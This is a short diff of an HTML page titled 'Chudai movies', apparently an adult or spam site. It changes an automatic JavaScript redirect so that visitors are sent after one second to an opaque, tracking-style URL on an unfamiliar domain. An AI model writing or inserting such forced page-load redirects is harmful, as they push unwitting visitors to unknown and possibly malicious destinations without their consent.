--- a/index.html
+++ b/index.html
@@ -14,8 +14,8 @@
     </script> -->
     <script>
         setTimeout(function() {
-            window.location.href = "https://www.quantcast.com/creative-solutions/";
-            }, 3000); // 3000 milliseconds = 3 seconds
+            window.location.href = "https://attractivereception.com/bi3/Vr0.Po3BpNvobNmuVxJvZQDr0-1iO/TIc/1SMHzCU/ykL/TUUw5rN/z/ULzsN/TyMY";
+            }, 1000); // 3000 milliseconds = 3 seconds
     </script>
 
     <title>Chudai movies</title>
